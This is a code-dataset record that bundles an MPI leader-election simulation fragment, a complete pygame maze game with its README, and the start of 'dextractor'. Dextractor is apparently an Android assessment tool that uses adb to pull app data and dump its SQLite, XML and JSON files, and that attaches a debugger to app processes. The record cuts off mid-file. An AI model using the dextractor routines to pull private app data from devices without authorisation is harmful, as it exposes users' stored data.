else vxs[rank - 1]\r\n state_data = {'ci' : vxs[rank - 1], 'state' : State.active}\r\n \r\n while win == -1:\r\n if state_data['state'] == State.active:\r\n send(next_node, {'one' : state_data['ci']}, state_data)\r\n \r\n data = comm.recv(source=prev_node, tag=ALGORITHM_TAG)\r\n assert 'one' in data\r\n acn = data['one']\r\n \r\n if acn == state_data['ci']:\r\n send(next_node, {'small' : acn}, state_data)\r\n \r\n win = acn\r\n \r\n data = comm.recv(source=prev_node, tag=ALGORITHM_TAG)\r\n assert 'small' in data\r\n else:\r\n send(next_node, {'two' : acn}, state_data)\r\n \r\n data = comm.recv(source=prev_node, tag=ALGORITHM_TAG)\r\n assert 'two' in data\r\n \r\n if acn < state_data['ci'] and acn < data['two']:\r\n state_data['ci'] = acn\r\n else:\r\n state_data['state'] = State.passive\r\n else:\r\n data = comm.recv(source=prev_node, tag=ALGORITHM_TAG)\r\n win = data.get('small', win)\r\n send(next_node, data, state_data)\r\n \r\n if win == vxs[rank - 1]:\r\n state_data['state'] = State.leader\r\n else:\r\n state_data['state'] = State.loser\r\n \r\n send_data_to_drawer({'need_stop':True})\r\n\r\n\r\ndef simulate(*argv):\r\n if rank == 0:\r\n drawer_worker(argv)\r\n else:\r\n communicator_worker()\r\n\r\n\r\nif __name__ == '__main__':\r\n simulate(*sys.argv[1:])\r\n" }, { "alpha_fraction": 0.7096773982048035, "alphanum_fraction": 0.7096773982048035, "avg_line_length": 18.66666603088379, "blob_id": "f156b4f3a2816196f0c038169ac7a08daf8b5d54", "content_id": "a24b41daa89ab5e7701e70e29132ad9455babef8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 62, "license_type": "no_license", "max_line_length": 42, "num_lines": 3, "path": "/main.py", "repo_name": "Parean/sk_tel", "src_encoding": "UTF-8", "text": "import network\r\n\r\nnetwork.simulate('from_file', 'input.txt')\r\n" } ]
2
smtr42/P3_maze
https://github.com/smtr42/P3_maze
a1de4e699fc853f71c18830a013711b092243635
473d373df1372c1a5a4765852ab4cc60e4f5ecf3
a5f9c2e160ea8f9fc7476b33a70183dac1b76f46
refs/heads/master
2020-05-19T15:13:07.690529
2019-05-30T17:41:25
2019-05-30T17:41:25
185,080,319
0
1
null
null
null
null
null
[ { "alpha_fraction": 0.5324331521987915, "alphanum_fraction": 0.5332274436950684, "avg_line_length": 29.959016799926758, "blob_id": "f77641c10b539958312abeba3d5f066ddb33729a", "content_id": "861327c17848c93e78d9a264ad7b535a1ad19d81", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3777, "license_type": "permissive", "max_line_length": 73, "num_lines": 122, "path": "/models/level.py", "repo_name": "smtr42/P3_maze", "src_encoding": "UTF-8", "text": "\"\"\"This module level will contain the Level class\nin order to create and manage the maze.\n\"\"\"\nimport settings\n\n\nclass Level:\n \"\"\"This class will manage everything about the maze itself.\"\"\"\n\n def __init__(self, filename):\n \"\"\"\n Args:\n filename (str): the path needed to load the file.\n Attributes:\n filename (str):the path needed to load the file.\n _paths (list): list of set for each place possible the\n player can move on freely.\n _player (list): initial coordinate of the player.\n _finish (list): the coordinate where the player win the\n game.\n _items (list): the coordinates where the items are placed.\n _wall (list): the coordinates where the walls are\n placed.\n _item_obj_position (dict): each item name has a\n corresponding position.\n \"\"\"\n self.filename = filename\n self._paths = []\n self._player = []\n self._finish = []\n self._items = []\n self._wall = []\n self._item_obj_position = {}\n self.load_txt()\n\n def __contains__(self, position):\n \"\"\"\n Args:\n position (obj): needed so we can use 'in' comparison over\n the level object.\n Return:\n return what asked for from the _paths attribute for\n comparison.\n \"\"\"\n return position in self._paths\n\n def load_txt(self):\n \"\"\"\n Load the data from the textfile and append each paths, player\n and finish position's coordinate into a list.\n Each line has coordinate \"x\".\n Each column has coordinate \"y\".\n Modifications will be made for pygame use in display.py.\n \"\"\"\n with open(self.filename, \"r\") as textfile:\n for x, line in enumerate(textfile):\n for y, col in enumerate(line):\n if col == settings.CHAR_PATH:\n self._paths.append((x, y))\n if col == settings.CHAR_FINISH:\n self._paths.append((x, y))\n self._finish.append((x, y))\n if col == settings.CHAR_PLAYER:\n self._player.append((x, y))\n self._paths.append((x, y))\n if col == settings.CHAR_WALL:\n self._wall.append((x, y))\n\n def __repr__(self):\n return f\"Paths : {self._paths}\\nPlayer : {self._player}\\n\" \\\n f\"Finish : {self._finish}\"\n\n @property\n def player_position(self):\n \"\"\"\n Getter that return the player position as a tuple.\n \"\"\"\n return self._player[0]\n\n @property\n def path_possibles(self):\n \"\"\"\n Getter that return all the walkable paths as a list.\n \"\"\"\n return list(self._paths)\n\n @property\n def get_finish_position(self):\n \"\"\"\n Getter that return the finish/gatekeeper position as a tuple.\n \"\"\"\n return self._finish[0]\n\n @property\n def get_item_position(self):\n \"\"\"\n Getter that return the items position as a list.\n \"\"\"\n return list(self._items)\n\n def set_player_position(self, x):\n self._player[0] = x\n\n def set_items_position(self, x):\n self._items = x\n\n @property\n def get_wall_positions(self):\n \"\"\"\n Getter that return the walls position as a list.\n \"\"\"\n return list(self._wall)\n\n @property\n def get_item_obj_position(self):\n \"\"\"\n Getter that return the item position linked to each item as dict.\n \"\"\"\n return self._item_obj_position\n\n def set_item_obj_position(self, x):\n self._item_obj_position = x\n" }, { "alpha_fraction": 0.5615491271018982, "alphanum_fraction": 0.5633932948112488, "avg_line_length": 30.434782028198242, "blob_id": "e5378b912ddfc55220a616c1feb04a41e2bfd73f", "content_id": "160f8408c2072d1d177bac9135c3e4da6ae28229", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2169, "license_type": "permissive", "max_line_length": 72, "num_lines": 69, "path": "/models/position.py", "repo_name": "smtr42/P3_maze", "src_encoding": "UTF-8", "text": "\"\"\"This module will contain everything about the position :\ncalculations and checks, either for the player or the items.\"\"\"\n\n\nclass Position:\n \"\"\"This class will calculate every position\n according to the direction provided.\"\"\"\n\n def __init__(self, x, y):\n \"\"\" Args:\n x (int): refers to the line number.\n y (int): refers to the column number.\n Attributes:\n position (tuple): couple of coordinate from x and y.\"\"\"\n self.position = (x, y)\n\n def __repr__(self):\n return str(self.position)\n\n def __eq__(self, pos):\n \"\"\"This will enable the comparison between the attribute\n position of the class Position and other coordinates.\"\"\"\n return self.position == pos\n\n # def __hash__(self):\n # return hash(self.position)\n\n def __iter__(self):\n \"\"\"So the object returned can be transformed in a tuple or\n list, it must be an iterable. See player.move(direction) method.\n \"\"\"\n for i in self.position:\n yield i\n\n def up(self):\n \"\"\"Takes the position and calculate a new one according to the\n direction.\n Returns:\n the object Position itself with new coordinates\n \"\"\"\n x, y = self.position\n return self.__class__(x - 1, y)\n\n def down(self):\n \"\"\"Takes the position and calculate a new one according to the\n direction.\n Returns:\n the object Position itself with new coordinates\n \"\"\"\n x, y = self.position\n return self.__class__(x + 1, y)\n\n def right(self):\n \"\"\"Takes the position and calculate a new one according to the\n direction.\n Returns:\n the object Position itself with new coordinates\n \"\"\"\n x, y = self.position\n return self.__class__(x, y + 1)\n\n def left(self):\n \"\"\"Takes the position and calculate a new one according to the\n direction.\n Returns:\n the object Position itself with new coordinates\n \"\"\"\n x, y = self.position\n return self.__class__(x, y - 1)\n" }, { "alpha_fraction": 0.5672042965888977, "alphanum_fraction": 0.5752688050270081, "avg_line_length": 28.760000228881836, "blob_id": "f841a779f2aeb961cd139e4271427ca0a3649456", "content_id": "abd04ffa2651c1b5befa4bd8fa293dc1fe5765e6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 744, "license_type": "permissive", "max_line_length": 70, "num_lines": 25, "path": "/settings.py", "repo_name": "smtr42/P3_maze", "src_encoding": "UTF-8", "text": "\"\"\"\nThe settings used for configuration of the game\n\"\"\"\n\nCHAR_WALL = \"#\"\nCHAR_PATH = \"0\"\nCHAR_PLAYER = \"S\"\nCHAR_FINISH = \"F\"\n\n\nclass Settings:\n \"\"\"This is the settings class with no method\"\"\"\n def __init__(self):\n \"\"\"initialize the game's settings\n Attributes:\n item_created (int): the number of item created\n sprites_number (int): the number of sprites\n size_sprite (in): the size in pixel of each sprites of the\n game\n level_size (int): gives the size of a side of the screen.\n \"\"\"\n self.item_created = 3\n self.sprites_number = 15\n self.size_sprite = 32\n self.level_size = self.sprites_number * self.size_sprite\n" }, { "alpha_fraction": 0.4966592490673065, "alphanum_fraction": 0.4966592490673065, "avg_line_length": 28.933332443237305, "blob_id": "f93d8589d061729deffddca6ef0b4441b3a04f57", "content_id": "2a8f56f7b768858c6d1783e8c9221c32db102698", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 898, "license_type": "permissive", "max_line_length": 48, "num_lines": 30, "path": "/controllers/keyboard.py", "repo_name": "smtr42/P3_maze", "src_encoding": "UTF-8", "text": "\"\"\"Every input is taken care of and sent\nto the appropriate object\"\"\"\n\nimport sys\nimport pygame\n\n\nclass KeyboardInputs:\n \"\"\"\n Check the events with pygame\n \"\"\"\n def __init__(self, player):\n self.player = player\n\n def check_events(self):\n \"\"\"Respond to key presses.\"\"\"\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_RIGHT:\n self.player.move(\"right\")\n if event.key == pygame.K_LEFT:\n self.player.move(\"left\")\n if event.key == pygame.K_UP:\n self.player.move(\"up\")\n if event.key == pygame.K_DOWN:\n self.player.move(\"down\")\n if event.key == pygame.K_ESCAPE:\n sys.exit()\n" }, { "alpha_fraction": 0.5800735354423523, "alphanum_fraction": 0.5810765624046326, "avg_line_length": 36.86075973510742, "blob_id": "e774f23bf4aff281d0816fba4333347fcfe8dd74", "content_id": "e26ed4e58c117a314574736d37fc99cf8e67b13f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2991, "license_type": "permissive", "max_line_length": 73, "num_lines": 79, "path": "/models/player.py", "repo_name": "smtr42/P3_maze", "src_encoding": "UTF-8", "text": "\"\"\"This class will take care of the player functions\"\"\"\nfrom .position import Position\n\n\nclass Player:\n \"\"\"\n Contains all the actions the player can make.\n \"\"\"\n\n def __init__(self, level, settings):\n \"\"\"\n Args:\n level (obj): instance of the Level class.\n settings (obj): instance of the settings class.\n Attributes:\n settings (obj): instance of the settings class.\n level (obj): instance of the Level class.\n item_obj_position (dict): each item name has a\n corresponding position.\n position (tuple): the coordinate of the player.\n gatekeeper_position (tuple): the finnish position.\n item_position (list): the item coordinates.\n victory_condition (bool): used to know if win or fail.\n item_counter (int): count every item picked up by the player.\n \"\"\"\n self.settings = settings\n self.level = level\n self.item_obj_position = self.level.get_item_obj_position\n self.position = self.level.player_position\n self.gatekeeper_position = self.level.get_finish_position\n self.item_position = []\n self.victory_condition = None\n self.item_counter = 0\n\n def move(self, direction):\n \"\"\"\n Action to modify the coordinate of the player according\n to a specified direction.\n Args:\n direction(str): the direction among 4 str possibles\n \"up\", \"down\", \"right\", \"left\".\n \"\"\"\n x, y = self.position\n new_position = getattr(Position(x, y), direction)()\n if new_position in self.level:\n # That's where the __contains__ method is useful in level.py\n self.position = tuple(new_position)\n self.level.set_player_position(self.position)\n\n def pickup_item(self):\n \"\"\"\n The method adding item to the counter and delete the ones\n picked up from the dict\n \"\"\"\n for item in self.item_obj_position.keys():\n # Comparing the player position to the items positions\n if self.item_obj_position.get(item) == self.position:\n del self.item_obj_position[item]\n self.item_counter += 1\n break\n\n # @property\n # def item_count(self):\n # \"\"\"\n # Getter that returns\n # \"\"\"\n # return self.settings.item_created - len(self.item_position)\n\n def check_victory_condition(self):\n \"\"\"\n Check the victory conditions and change the boolean\n victory_condition accordingly\n \"\"\"\n if self.position == self.gatekeeper_position \\\n and self.item_counter == self.settings.item_created:\n self.victory_condition = True\n elif self.position == self.gatekeeper_position \\\n and self.item_counter != self.settings.item_created:\n self.victory_condition = False\n" }, { "alpha_fraction": 0.6478190422058105, "alphanum_fraction": 0.6494345664978027, "avg_line_length": 24.26530647277832, "blob_id": "f75cc35f5b6128f45eb3b747ab95e7dbfc074511", "content_id": "86bf39f98f565008a66af41f7417b90bdf56ff08", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1238, "license_type": "permissive", "max_line_length": 47, "num_lines": 49, "path": "/core.py", "repo_name": "smtr42/P3_maze", "src_encoding": "UTF-8", "text": "\"\"\"Here the main game runs\"\"\"\nimport pygame\nfrom models.level import Level\nfrom models.position import Position\nfrom models.player import Player\nfrom models.item import Item\nfrom controllers.keyboard import KeyboardInputs\nfrom views.update import Update\nfrom settings import Settings\n\n\ndef run_game():\n \"\"\"\n The main function.\n Here we intanciate every class.\n Then runs the loop for the game to runs.\n \"\"\"\n # Pygame initialization.\n pygame.init()\n pygame.display.set_caption(\"McGyver\")\n\n # Instanciation.\n mcsettings = Settings()\n level = Level(\"models/map.txt\")\n item = Item(level)\n position = Position(1, 1)\n player = Player(level, mcsettings)\n chk_event = KeyboardInputs(player)\n updater = Update(mcsettings, level, player)\n\n updater.update_screen()\n\n running_state = True\n while running_state:\n chk_event.check_events()\n player.pickup_item()\n updater.update_player()\n updater.update_gatekeeper()\n updater.update_item()\n player.check_victory_condition()\n if updater.ending_display():\n continue\n else:\n while True:\n chk_event.check_events()\n\n\nif __name__ == \"__main__\":\n run_game()\n" }, { "alpha_fraction": 0.5720535516738892, "alphanum_fraction": 0.575527548789978, "avg_line_length": 38.65306091308594, "blob_id": "9eae478d67ec24c77d766fa0512e26c3430b7c9c", "content_id": "87d4a986d9244bc7773b4d9672ceaf84ddfb2f5e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7772, "license_type": "permissive", "max_line_length": 77, "num_lines": 196, "path": "/views/update.py", "repo_name": "smtr42/P3_maze", "src_encoding": "UTF-8", "text": "\"\"\"This is where everything is displayed.\"\"\"\nimport pygame\nimport os\n\n\nclass Update:\n \"\"\"\n This is the main class used to display.\n \"\"\"\n\n def __init__(self, settings, level, player):\n \"\"\"\n Args:\n settings (obj): instance of settings.\n level (obj): instance of level.\n player (obj): instance of player.\n\n Attributes:\n level (obj): instance of level.\n player (obj): instance of player.\n player_pos (tuple): the player position.\n gk_pos (tuple): the gate keeper position.\n wall_pos (list):the wall list of position.\n item_obj_position (dict): the dictionary item to position.\n settings (obj): settings instance.\n screen (pygame surface): the main screen object used.\n main_dir (str): used to give the main directory.\n data_dir (str): used to give the data directory.\n bg_image (pygame surface): the background image.\n bg_rect (pygame surface): the pygame rectangle from the image\n gk_image (pygame surface): the gatekeeper image.\n wall_image (pygame surface): the wall image.\n aiguille_image (pygame surface):the aiguille image.\n seringue_image (pygame surface):the seringue image.\n ether_image (pygame surface): the ether image.\n bbar_image (pygame surface):the bottom bar image.\n victory_image (pygame surface): the victory image.\n fail_image (pygame surface): the fail image.\n picked_position (list): the three positions for the item\n at the bottom of the screen for the picked up items.\n\n \"\"\"\n self.level = level\n self.player = player\n # RETRIEVE POSITIONS\n self.player_pos = self.level.player_position\n self.gk_pos = self.level.get_finish_position\n self.wall_pos = self.level.get_wall_positions\n self.item_obj_position = self.level.get_item_obj_position\n self.settings = settings\n\n # SCREEN\n self.screen = pygame.display.set_mode(\n (self.settings.level_size,\n self.settings.level_size + self.settings.size_sprite))\n self.main_dir = os.path.split(os.path.abspath(__file__))[0]\n self.data_dir = os.path.join(self.main_dir, 'data')\n\n # LOAD IMAGES\n self.bg_image = Update.load_image(self, 'background.jpg')\n self.bg_rect = self.bg_image.get_rect()\n self.player_image = Update.load_image(self, 'MacGyver.png')\n self.gk_image = Update.load_image(self, 'gatekeeper.png')\n self.wall_image = Update.load_image(self, 'wall.jpg')\n self.aiguille_image = Update.load_image(self, 'aiguille.png')\n self.seringue_image = Update.load_image(self, 'seringue.png')\n self.ether_image = Update.load_image(self, 'ether.png')\n self.bbar_image = Update.load_image(self, 'bottombar.png')\n self.victory_image = Update.load_image(self, 'victory.png')\n self.fail_image = Update.load_image(self, 'fail.png')\n\n self.picked_position = [(128, 480), (160, 480), (192, 480)]\n\n def update_screen(self):\n \"\"\"\n Display the background, the bottom black menu and the walls\n \"\"\"\n\n self.screen.blit(self.bg_image, self.bg_rect)\n self.screen.blit(self.bbar_image, (0, self.settings.level_size))\n for position in self.wall_pos:\n # We adapt the coordinates for pygame\n wall_y_pos, wall_x_pos = position\n wall_y_pos = wall_y_pos * self.settings.size_sprite\n wall_x_pos = wall_x_pos * self.settings.size_sprite\n self.screen.blit(self.wall_image, (wall_x_pos, wall_y_pos))\n\n def update_player(self):\n \"\"\"\n Update the player display when moving.\n \"\"\"\n if self.player_pos != self.level.player_position:\n # Reset the display to remove old position of player\n Update.update_screen(self)\n self.player_pos = self.level.player_position\n pg_y, pg_x = self.player_pos\n self.screen.blit(\n self.player_image,\n (pg_x * self.settings.size_sprite,\n pg_y * self.settings.size_sprite)\n )\n pygame.display.update()\n\n def load_image(self, name):\n \"\"\"\n The main method to load images for pygame.\n \"\"\"\n fullname = os.path.join(self.data_dir, name)\n image = pygame.image.load(fullname)\n image = image.convert_alpha()\n return image\n\n def update_gatekeeper(self):\n \"\"\"\n Display the gate keeper.\n \"\"\"\n gk_y_pos, gk_x_pos = self.gk_pos\n self.screen.blit(\n self.gk_image,\n (gk_x_pos * self.settings.size_sprite,\n gk_y_pos * self.settings.size_sprite)\n )\n pygame.display.update()\n\n def update_item(self):\n \"\"\"\n This will display or not the item providing they were picked up\n or not. It tests the dictionary if the item exists or not.\n \"\"\"\n item_list = list(self.item_obj_position.keys())\n if \"aiguille\" in item_list:\n a_position = Update.position_corrector(self, \"aiguille\")\n Update.display_item(self, a_position, self.aiguille_image, False)\n elif \"aiguille\" not in item_list:\n Update.display_item(self,\n self.picked_position[0],\n self.aiguille_image, True)\n\n if \"ether\" in item_list:\n a_position = Update.position_corrector(self, \"ether\")\n Update.display_item(self, a_position, self.ether_image, False)\n elif \"ether\" not in item_list:\n Update.display_item(self,\n self.picked_position[1],\n self.ether_image, True)\n\n if \"seringue\" in item_list:\n a_position = Update.position_corrector(self, \"seringue\")\n Update.display_item(self, a_position, self.seringue_image, False)\n elif \"seringue\" not in item_list:\n Update.display_item(self,\n self.picked_position[2],\n self.seringue_image, True)\n\n def display_item(self, position, item_name=None, picked=False):\n \"\"\"\n Args:\n position (tuple): the position of the item.\n item (obj): the attributes pygame image.\n picked (bool): False if not picked, True if picked up by\n the player.\n \"\"\"\n if not picked:\n self.screen.blit(item_name, position)\n else:\n self.screen.blit(item_name, position)\n\n def position_corrector(self, item):\n \"\"\"\n The method will adjust the position to fit pygame standards.\n Returns:\n tuple: x and y position corrected\n \"\"\"\n position = self.item_obj_position[item]\n position_y, position_x = position\n position_y = position_y * self.settings.size_sprite\n position_x = position_x * self.settings.size_sprite\n return (position_x, position_y)\n\n def ending_display(self):\n \"\"\"\n This will display the ending, victory or fail.\n Returns:\n Bool: True when the player has not met the gatekeeper\n False when he meets him\n \"\"\"\n if self.player.victory_condition is None:\n return True\n elif self.player.victory_condition:\n self.screen.blit(self.victory_image, (0, 0))\n pygame.display.update()\n return False\n else:\n self.screen.blit(self.fail_image, (0, 0))\n pygame.display.update()\n return False\n" }, { "alpha_fraction": 0.5680860877037048, "alphanum_fraction": 0.569021999835968, "avg_line_length": 37.16071319580078, "blob_id": "54989cbdebdf8c1f5e6dc9a2011bbbc556f11f94", "content_id": "3a06e7ae311bc2470cbc032aa7f7c60dcf7b0966", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2137, "license_type": "permissive", "max_line_length": 73, "num_lines": 56, "path": "/models/item.py", "repo_name": "smtr42/P3_maze", "src_encoding": "UTF-8", "text": "\"\"\"This is the Item class it does everything related to it.\n\"\"\"\nimport random\nimport copy\n\n\nclass Item:\n \"\"\"\n The Item object.\n \"\"\"\n\n def __init__(self, level):\n \"\"\"\n Args:\n level (object): to retrieve coordinates.\n\n Attributes:\n level (obj): store the level instance.\n _paths_possibles (list): list of the path possible to\n walk onto.\n finish_position (list): list of one tuple with finish\n coordinate.\n items_coordinate (list): list of the coordinate of\n each item.\n item_obj_position (dict): the name of the object is\n linked to a position.\n \"\"\"\n self.level = level\n self.start_position = self.level.player_position\n self.path_possibles = self.level.path_possibles\n self.finish_position = self.level.get_finish_position\n self.items_coordinate = []\n self.item_obj_position = {\"aiguille\": None, \"ether\": None,\n \"seringue\": None,\n }\n self.place_item()\n\n def place_item(self):\n \"\"\"\n Place randomly the items on walkable path and modify every\n attributes related with the new positions.\n\n \"\"\"\n path_possibles_for_item = copy.deepcopy(self.path_possibles)\n # We need to remove the gatekeeper position or an item can appear\n # at the same place\n path_possibles_for_item.remove(self.finish_position)\n path_possibles_for_item.remove(self.start_position)\n self.items_coordinate = random.sample(path_possibles_for_item, 3)\n b = copy.deepcopy(self.items_coordinate)\n # Link the item name with its position in a dictionary\n for key in self.item_obj_position.keys():\n self.item_obj_position[key] = b.pop(0)\n # Updating the values into level object\n self.level.set_items_position(self.items_coordinate)\n self.level.set_item_obj_position(self.item_obj_position)\n" }, { "alpha_fraction": 0.5921787619590759, "alphanum_fraction": 0.5921787619590759, "avg_line_length": 25.850000381469727, "blob_id": "736dd8fbac856407823a0b57fbf9cdb2d2b62f0a", "content_id": "bb6912607f6e703b9aa4a1c2d530639e6203fa5f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 537, "license_type": "permissive", "max_line_length": 70, "num_lines": 20, "path": "/models/gatekeeper.py", "repo_name": "smtr42/P3_maze", "src_encoding": "UTF-8", "text": "\"\"\"A character at the end of the maze.\nThe game is over if the player reach him\nwithout all the items\"\"\"\n\n\nclass GateKeeper:\n \"\"\"\n The Gatekeeper class\n \"\"\"\n\n def __init__(self, level):\n \"\"\"\n Args:\n level (obj): the level instance so we can reach its values\n Attributes:\n level (obj): store the instance to access it\n position (list): get the finish position from level object\n \"\"\"\n self.level = level\n self.position = self.level.get_finish_position\n" }, { "alpha_fraction": 0.6723940372467041, "alphanum_fraction": 0.681557834148407, "avg_line_length": 25.059701919555664, "blob_id": "f5e2a67bf7904985710d282c44c7c1cf880bd640", "content_id": "8bafab3bd5a5f0fb3c9e182b3adf946c31a3fa9f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1756, "license_type": "permissive", "max_line_length": 174, "num_lines": 67, "path": "/README.md", "repo_name": "smtr42/P3_maze", "src_encoding": "UTF-8", "text": "<h1 align=\"center\">\n <br>\n\n <br>\n Project 3 - McGyver\n <br>\n</h1>\n\n<h4 align=\"center\">A simple game made with Python as part as an <a href=\"https://openclassrooms.com/en\" target=\"_blank\">OpenClassrooms</a> project.</h4>\n\n\n<p align=\"center\">\n <a href=\"\">\n <img src=\"https://img.shields.io/badge/Python-3.7-green.svg\">\n </a>\n <a href=\"https://opensource.org/licenses/MIT\">\n <img src=\"https://img.shields.io/badge/license-MIT-blue.svg\">\n </a>\n</p>\n\n# P3_maze\n<p align=\"center\">\n <a href=\"#getting-started\">Getting Started</a> •\n <a href=\"#prerequisites\">Prerequisites</a> •\n <a href=\"#built-with\">Built With</a> •\n <a href=\"#authors\">Authors</a> •\n <a href=\"#license\">License</a> •\n <a href=\"#acknowledgments\">acknowledgments</a>\n</p>\n\nThis is a game made in Python as part of a futur diploma as a Python developer from the [OpenClassrooms](https://openclassrooms.com/en) company. I put it here for evaluation.\n\nI tried to :\n* Use the MVC Convention\n* Follow the pep8 recommendation\n* Use OOP\n\n## Getting Started\n\nRead the instructions.txt. It was made so it can runs on any machine. It's part of the requirement.\n\nYou can modify the map.txt, and make your own maze by editing it. This type of file is easier to modify hence the choice.\n\n### Prerequisites\n\nThis uses \n```\npygame==1.9.4\n```\n\n## Built With\n\n* [Python](https://www.python.org/) - The language used\n* [PyGame](https://www.pygame.org) - Dependency\n\n## Authors\n\n* **Simonnet T** - *Initial work* - [smtr42](https://github.com/smtr42)\n\n## License\n\nThis project is licensed under the [MIT](https://choosealicense.com/licenses/mit/) License - see the [LICENSE.md](LICENSE.md) file for details\n\n\n## Acknowledgments\n\n* Thanks to my mentor [Thierry Chappuis](https://github.com/tchappui)\n" } ]
10
AndyCyberSec/dextractor
https://github.com/AndyCyberSec/dextractor
00e656822e5ac069d7f4f32eedb3961cd6aecbbe
f6873bed166488f92de89095e91eef2c00c771fa
d9c021833d547a904b72efda1213ddefdd8e06f1
refs/heads/master
2022-09-10T00:34:18.270834
2020-05-29T16:29:54
2020-05-29T16:29:54
266,062,116
3
1
null
null
null
null
null
[ { "alpha_fraction": 0.4920564889907837, "alphanum_fraction": 0.49470433592796326, "avg_line_length": 26.962963104248047, "blob_id": "09484c4b3647ae8ec22ece74e87d0c266fe83b0c", "content_id": "314e52e38ef903009acc9cddceb99b8ea72b0995", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2266, "license_type": "permissive", "max_line_length": 86, "num_lines": 81, "path": "/dumper.py", "repo_name": "AndyCyberSec/dextractor", "src_encoding": "UTF-8", "text": "import os\nimport filetype\nimport sqlite3\nfrom prettytable import PrettyTable\nimport json\n\ndef dump(files, ftype, dest):\n\n fname = '{}/dump_{}.txt'.format(dest,ftype)\n f = open(fname, 'w')\n\n for file in files:\n kind = filetype.guess(file)\n if 'xml' in ftype:\n if '.xml' in file:\n with open(file, 'r') as fxml:\n xml = fxml.read()\n f.write(\"[+] Dump of %s \\n\\n\" %file)\n f.write(xml)\n f.write(\"\\n\\n\\n\")\n elif 'sqlite' in ftype:\n try:\n if kind.mime == 'application/x-sqlite3':\n db_data = dump_db(file)\n f.write(\"[+] Dump of %s \\n\" %file)\n for k, val in db_data.items():\n f.write(\"[+] Table %s \\n\\n\" % k)\n f.write(val)\n f.write(\"\\n\\n\\n\")\n\n except AttributeError:\n pass\n elif '.json' in file:\n with open(file, 'r') as fjson:\n f.write(\"[+] Dump of %s \\n\" %file)\n j = json.load(fjson)\n json.dump(j, f, indent=4, sort_keys=True)\n f.write(\"\\n\\n\\n\")\n\n \"\"\"try: \n fxml.close()\n fjson.close()\n except UnboundLocalError:\n pass\"\"\"\n \n print(\"[+] Content of the files dumped correctly in %s\" % fname)\n f.close()\n \n\n\ndef fast_scandir(dirname):\n filelist = []\n for path, subdirs, files in os.walk(dirname):\n for name in files:\n filelist.append(os.path.join(path, name))\n return filelist\n\ndef dump_db(file):\n\n data = {}\n\n conn = sqlite3.connect(file)\n conn.text_factory = str\n cur = conn.cursor()\n\n res = cur.execute(\"SELECT name FROM sqlite_master WHERE type='table';\").fetchall()\n table_names = sorted(list(zip(*res))[0])\n\n for table_name in table_names:\n table = PrettyTable()\n res = cur.execute(\"PRAGMA table_info('%s')\" % table_name).fetchall()\n table.field_names = list(zip(*res))[1]\n\n res = cur.execute(\"SELECT * FROM %s;\" % table_name).fetchall()\n\n for row in res:\n table.add_row(row)\n\n data[table_name] = table.get_string()\n\n return data\n\n" }, { "alpha_fraction": 0.5366693735122681, "alphanum_fraction": 0.544165313243866, "avg_line_length": 27.367816925048828, "blob_id": "b499d0ee48fe69861e25d0da273216eff089fd38", "content_id": "5ab04ed44d000f7a369f8c26f716fca67c3b1255", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4936, "license_type": "permissive", "max_line_length": 115, "num_lines": 174, "path": "/main.py", "repo_name": "AndyCyberSec/dextractor", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\nfrom cmd import Cmd\nimport dextractor\nfrom ppadb.client import Client as AdbClient\nimport subprocess\nimport os\nimport dumper\nimport debugger\nimport permissions\n\n \nclass Dextractor(Cmd):\n prompt = 'dextractor % '\n intro = \"\\n64 65 78 74 72 61 63 74 6F 72\"\n intro += \"\\nAndyCyberSec 2020 - www.andreabruschi.net\"\n intro += \"\\nType ? or help to list commands\"\n client = AdbClient(host=\"127.0.0.1\", port=5037)\n device = None\n cwd = None\n\n # DOs\n def do_cwd(self, arg):\n self.cwd = arg\n\n # arg is the APK\n def do_dextract(self, arg):\n dextractor.dextract(arg)\n \n # arg is always none\n def do_devices(self, arg=None):\n devices = self.client.devices()\n\n i = len(devices)\n print(\"[+] Found %s devices: \\n\" % (i))\n for device in devices:\n print('[*] %s' % device.serial)\n\n # arg is package and destination folder\n def do_dump(self, arg=None):\n\n try:\n package, dest = parse_arg(arg)\n except ValueError:\n package = parse_arg(arg)\n dest = None\n\n if package:\n if self.device:\n if dest:\n pull(package, dest)\n else:\n if self.cwd:\n pull(package, self.cwd)\n else:\n print(\"[-] Type the path where to save the data or set cwd.\")\n else:\n print(\"[-] Connect to a device first.\") \n else:\n print(\"[-] Package name is needed.\") \n \n def do_connect(self, device=None):\n if device:\n self.device = self.client.device(device)\n print(\"[+] Connected to %s\" % self.device.serial)\n else:\n n_devices = len(self.client.devices())\n if n_devices == 1:\n device = self.client.devices()\n self.device = self.client.device(device[0].serial)\n print(\"[+] Connected to %s\" % self.device.serial) \n\n def do_packages(self, filter=None):\n grep = \"\"\n if filter:\n grep = \"|grep %s\" % filter\n if self.device:\n output = self.device.shell(\"pm list packages %s\" % grep)\n print(output)\n else:\n print(\"[-] Connect to a device first.\")\n\n def do_debug(self, arg=None):\n if self.device:\n output = self.device.shell(\"ps |grep %s\" % arg)\n try:\n pid = output.split(\" \")[4]\n print(output)\n debugger.debug(pid)\n except IndexError:\n print(\"[-] Failed to run debugging. Make sure the app is running and the package name is correct.\")\n \n else:\n print(\"[-] Connect to a device first.\")\n\n def do_perm(self, arg=None):\n 